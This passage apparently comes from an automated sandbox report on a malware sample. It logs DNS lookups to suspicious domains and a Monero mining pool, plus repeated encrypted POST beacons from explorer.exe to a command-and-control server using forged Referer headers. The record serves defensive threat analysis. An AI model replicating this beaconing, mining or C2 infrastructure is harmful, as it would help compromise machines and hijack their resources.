Nov 10, 2023 15:38:35.296973944 CET	49764	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:35.297002077 CET	49764	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:35.594270945 CET	80	49764	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:35.594405890 CET	80	49764	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:35.594482899 CET	49764	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:35.594681025 CET	49764	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:35.603152990 CET	49765	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:35.891623020 CET	80	49764	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:35.911204100 CET	80	49765	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:35.911281109 CET	49765	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:35.911516905 CET	49765	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:35.911550045 CET	49765	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:36.219532967 CET	80	49765	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:36.219624996 CET	80	49765	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:36.219702959 CET	49765	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:36.219922066 CET	49765	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:36.527548075 CET	80	49765	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:38.134254932 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:38:38.273437977 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:38:48.237493992 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:38:48.361357927 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:38:58.078638077 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:38:58.158226967 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:39:08.102371931 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:39:08.158232927 CET	49720	14433	192.168.2.6	51.15.58.224

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 10, 2023 15:35:34.955749989 CET	64058	53	192.168.2.6	1.1.1.1
Nov 10, 2023 15:35:35.156881094 CET	53	64058	1.1.1.1	192.168.2.6
Nov 10, 2023 15:35:35.161048889 CET	64465	53	192.168.2.6	1.1.1.1
Nov 10, 2023 15:35:35.855102062 CET	53	64465	1.1.1.1	192.168.2.6
Nov 10, 2023 15:35:57.635658026 CET	59319	53	192.168.2.6	1.1.1.1
Nov 10, 2023 15:35:57.790333986 CET	53	59319	1.1.1.1	192.168.2.6
Nov 10, 2023 15:35:58.687995911 CET	57214	53	192.168.2.6	1.1.1.1
Nov 10, 2023 15:35:58.840703011 CET	53	57214	1.1.1.1	192.168.2.6
Nov 10, 2023 15:36:43.577436924 CET	52677	53	192.168.2.6	1.1.1.1
Nov 10, 2023 15:36:43.730679989 CET	53	52677	1.1.1.1	192.168.2.6
Nov 10, 2023 15:36:43.741874933 CET	54968	53	192.168.2.6	1.1.1.1
Nov 10, 2023 15:36:44.106184006 CET	53	54968	1.1.1.1	192.168.2.6
Nov 10, 2023 15:36:48.873960972 CET	52689	53	192.168.2.6	1.1.1.1
Nov 10, 2023 15:36:49.026984930 CET	53	52689	1.1.1.1	192.168.2.6
Nov 10, 2023 15:36:54.431557894 CET	54978	53	192.168.2.6	1.1.1.1
Nov 10, 2023 15:36:54.587472916 CET	53	54978	1.1.1.1	192.168.2.6
Nov 10, 2023 15:37:01.276964903 CET	63752	53	192.168.2.6	1.1.1.1
Nov 10, 2023 15:37:01.432312012 CET	53	63752	1.1.1.1	192.168.2.6
Nov 10, 2023 15:37:10.140300035 CET	63178	53	192.168.2.6	1.1.1.1
Nov 10, 2023 15:37:10.336200953 CET	53	63178	1.1.1.1	192.168.2.6
Nov 10, 2023 15:37:19.127515078 CET	52446	53	192.168.2.6	1.1.1.1
Nov 10, 2023 15:37:19.281311035 CET	53	52446	1.1.1.1	192.168.2.6
Nov 10, 2023 15:37:27.834459066 CET	50777	53	192.168.2.6	1.1.1.1
Nov 10, 2023 15:37:27.991992950 CET	53	50777	1.1.1.1	192.168.2.6
Nov 10, 2023 15:37:38.961184025 CET	64325	53	192.168.2.6	1.1.1.1
Nov 10, 2023 15:37:39.115061998 CET	53	64325	1.1.1.1	192.168.2.6
Nov 10, 2023 15:37:39.124864101 CET	55366	53	192.168.2.6	1.1.1.1
Nov 10, 2023 15:37:39.853116989 CET	53	55366	1.1.1.1	192.168.2.6
Nov 10, 2023 15:37:48.744489908 CET	62693	53	192.168.2.6	1.1.1.1
Nov 10, 2023 15:37:48.897876024 CET	53	62693	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 10, 2023 15:35:34.955749989 CET	192.168.2.6	1.1.1.1	0x9e33	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:35.161048889 CET	192.168.2.6	1.1.1.1	0xdb68	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:57.635658026 CET	192.168.2.6	1.1.1.1	0x369c	Standard query (0)	xmr-eu1.nanopool.org	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:58.687995911 CET	192.168.2.6	1.1.1.1	0x421	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:36:43.577436924 CET	192.168.2.6	1.1.1.1	0x1abd	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:36:43.741874933 CET	192.168.2.6	1.1.1.1	0x6a08	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:36:48.873960972 CET	192.168.2.6	1.1.1.1	0xeb06	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:36:54.431557894 CET	192.168.2.6	1.1.1.1	0x7a93	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:37:01.276964903 CET	192.168.2.6	1.1.1.1	0x2097	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:37:10.140300035 CET	192.168.2.6	1.1.1.1	0x38de	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:37:19.127515078 CET	192.168.2.6	1.1.1.1	0xde5e	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:37:27.834459066 CET	192.168.2.6	1.1.1.1	0x64db	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:37:38.961184025 CET	192.168.2.6	1.1.1.1	0xc671	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:37:39.124864101 CET	192.168.2.6	1.1.1.1	0x2b47	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:37:48.744489908 CET	192.168.2.6	1.1.1.1	0x73b7	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 10, 2023 15:35:35.156881094 CET	1.1.1.1	192.168.2.6	0x9e33	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:35.855102062 CET	1.1.1.1	192.168.2.6	0xdb68	No error (0)	host-host-file8.com		95.214.26.28	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:57.790333986 CET	1.1.1.1	192.168.2.6	0x369c	No error (0)	xmr-eu1.nanopool.org		163.172.154.142	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:57.790333986 CET	1.1.1.1	192.168.2.6	0x369c	No error (0)	xmr-eu1.nanopool.org		51.68.143.81	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:57.790333986 CET	1.1.1.1	192.168.2.6	0x369c	No error (0)	xmr-eu1.nanopool.org		212.47.253.124	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:57.790333986 CET	1.1.1.1	192.168.2.6	0x369c	No error (0)	xmr-eu1.nanopool.org		51.255.34.118	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:57.790333986 CET	1.1.1.1	192.168.2.6	0x369c	No error (0)	xmr-eu1.nanopool.org		51.68.190.80	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:57.790333986 CET	1.1.1.1	192.168.2.6	0x369c	No error (0)	xmr-eu1.nanopool.org		135.125.238.108	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:57.790333986 CET	1.1.1.1	192.168.2.6	0x369c	No error (0)	xmr-eu1.nanopool.org		51.15.58.224	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:57.790333986 CET	1.1.1.1	192.168.2.6	0x369c	No error (0)	xmr-eu1.nanopool.org		51.15.193.130	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:57.790333986 CET	1.1.1.1	192.168.2.6	0x369c	No error (0)	xmr-eu1.nanopool.org		51.15.65.182	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:58.840703011 CET	1.1.1.1	192.168.2.6	0x421	No error (0)	pastebin.com		172.67.34.170	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:58.840703011 CET	1.1.1.1	192.168.2.6	0x421	No error (0)	pastebin.com		104.20.67.143	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:35:58.840703011 CET	1.1.1.1	192.168.2.6	0x421	No error (0)	pastebin.com		104.20.68.143	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:36:43.730679989 CET	1.1.1.1	192.168.2.6	0x1abd	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:36:44.106184006 CET	1.1.1.1	192.168.2.6	0x6a08	No error (0)	host-host-file8.com		95.214.26.28	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:36:49.026984930 CET	1.1.1.1	192.168.2.6	0xeb06	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:36:54.587472916 CET	1.1.1.1	192.168.2.6	0x7a93	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:37:01.432312012 CET	1.1.1.1	192.168.2.6	0x2097	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:37:10.336200953 CET	1.1.1.1	192.168.2.6	0x38de	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:37:19.281311035 CET	1.1.1.1	192.168.2.6	0xde5e	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:37:27.991992950 CET	1.1.1.1	192.168.2.6	0x64db	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:37:39.115061998 CET	1.1.1.1	192.168.2.6	0xc671	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:37:39.853116989 CET	1.1.1.1	192.168.2.6	0x2b47	No error (0)	host-host-file8.com		95.214.26.28	A (IP address)	IN (0x0001)	false
Nov 10, 2023 15:37:48.897876024 CET	1.1.1.1	192.168.2.6	0x73b7	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

ocyugmcp.com

host-host-file8.com

tmugk.com

rpfwsaim.org

kegnkcpidq.com

bxqfgpms.org

jgdfwhycbb.com

dqxfcxtqc.net

sxcdcfkj.com

jlmfcqwlhw.org

pwlgf.net

euufg.com

kxuoq.net

vebudrviog.org

wrrdwyfsj.org

criwvjvtwq.org

jwddotbdq.org

xmobe.org

swunoda.org

jyicmpi.com

jbdwgxah.com

hpfeeptar.org

ydikox.net

qcunmavvat.net

kibrkvnbk.com

rihjsppp.net

mogop.com

ebswgoa.net

hodjcq.net

vrhgpp.org

mqetfsc.org

rkucq.com

vngcolxw.net

liedn.net

ldxhifgucj.com

pemamjvcpk.org

qcgvlxft.com

ogmthh.net

nlijd.org

nugxs.org

fotbgladl.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49719	172.67.34.170	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49715	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:35:36.159581900 CET	150	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ocyugmcp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 201 Host: host-host-file8.com
Nov 10, 2023 15:35:36.159661055 CET	150	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 40 bd de 10 Data Ascii: 9}6F>1.lo}k\wu$f]d@FbL[on.^[-hkhVqu`1P?/Z-#8; }.C$`_Y5lmUZ>uw=fiH *\;mr'
Nov 10, 2023 15:35:36.457129002 CET	151	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.6	49733	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:36:50.018204927 CET	247	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pwlgf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 111 Host: host-host-file8.com
Nov 10, 2023 15:36:50.018291950 CET	247	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 22 91 c4 32 Data Ascii: 9}6F>1.lo}k\wu$f]d"2hbTJ@5C`41q`8h
Nov 10, 2023 15:36:50.320105076 CET	248	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.6	49734	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:36:50.814467907 CET	248	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://euufg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 202 Host: host-host-file8.com
Nov 10, 2023 15:36:50.814503908 CET	249	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1d c1 a3 06 Data Ascii: 9}6F>1.lo}k\wu$f]d^3>knWJPQgzu{9?dw%L^<4o&j<x3)8@)Tns+9Hlr;H:mTi%T0R=dH[
Nov 10, 2023 15:36:51.115509033 CET	249	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.6	49735	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:36:51.559272051 CET	250	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kxuoq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 312 Host: host-host-file8.com
Nov 10, 2023 15:36:51.559272051 CET	250	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 5d d9 bd 79 Data Ascii: 9}6F>1.lo}k\wu$f]d]yXhh@!HgCnPW<V.:V>Q<[Gd2e0R;3ll 0fPbpR3dXp0Gj&mR,<H:zP7\qqvXJ:_
Nov 10, 2023 15:36:51.858726025 CET	250	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.6	49736	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:36:54.899068117 CET	252	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vebudrviog.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 173 Host: host-host-file8.com
Nov 10, 2023 15:36:54.899097919 CET	252	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 40 a1 86 77 Data Ascii: 9}6F>1.lo}k\wu$f]d@wPLi[\RGk[{rGtx!"Hb ;$JH2q~7+_//wSN\2{_
Nov 10, 2023 15:36:55.200535059 CET	252	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.6	49737	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:36:56.864502907 CET	253	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wrrdwyfsj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 198 Host: host-host-file8.com
Nov 10, 2023 15:36:56.864552021 CET	253	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 35 c5 8a 67 Data Ascii: 9}6F>1.lo}k\wu$f]d5gEs]tZ#kIE1/l0r>4!N;YvD ]t<G1OJMJ;A,e+2qBYv1E)
Nov 10, 2023 15:36:57.166098118 CET	253	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.6	49738	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:37:01.946599960 CET	254	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://criwvjvtwq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 240 Host: host-host-file8.com
Nov 10, 2023 15:37:01.946645021 CET	255	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 5d bf d8 63 Data Ascii: 9}6F>1.lo}k\wu$f]d]ca7jb296AMCv8j#3XAQgEW~].x3r/=Q2a{bQn:rc,\|^<S_as7$Ua{#8K"{q{5m^w~Vu
Nov 10, 2023 15:37:02.246140957 CET	255	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.6	49739	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:37:03.017003059 CET	256	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jwddotbdq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: host-host-file8.com
Nov 10, 2023 15:37:03.017036915 CET	256	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 4f 89 a0 04 Data Ascii: 9}6F>1.lo}k\wu$f]dO(qzJf[\!&LS'Nf8!1>@\=[
Nov 10, 2023 15:37:03.316585064 CET	256	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.6	49740	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 10, 2023 15:37:06.420964956 CET	257	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xmobe.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 162 Host: host-host-file8.com
Nov 10, 2023 15:37:06.420991898 CET	257	OUT	Data Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 17 d1 d1 27 Data Ascii: 9}6F>1.lo}k\wu$f]d'3t3ab-UrN"loYopMl{0g \|~i/]vyL4"akB(b'!W
Nov 10, 2023 15:37:06.721905947 CET	257	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.6	49741	95.214.26.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
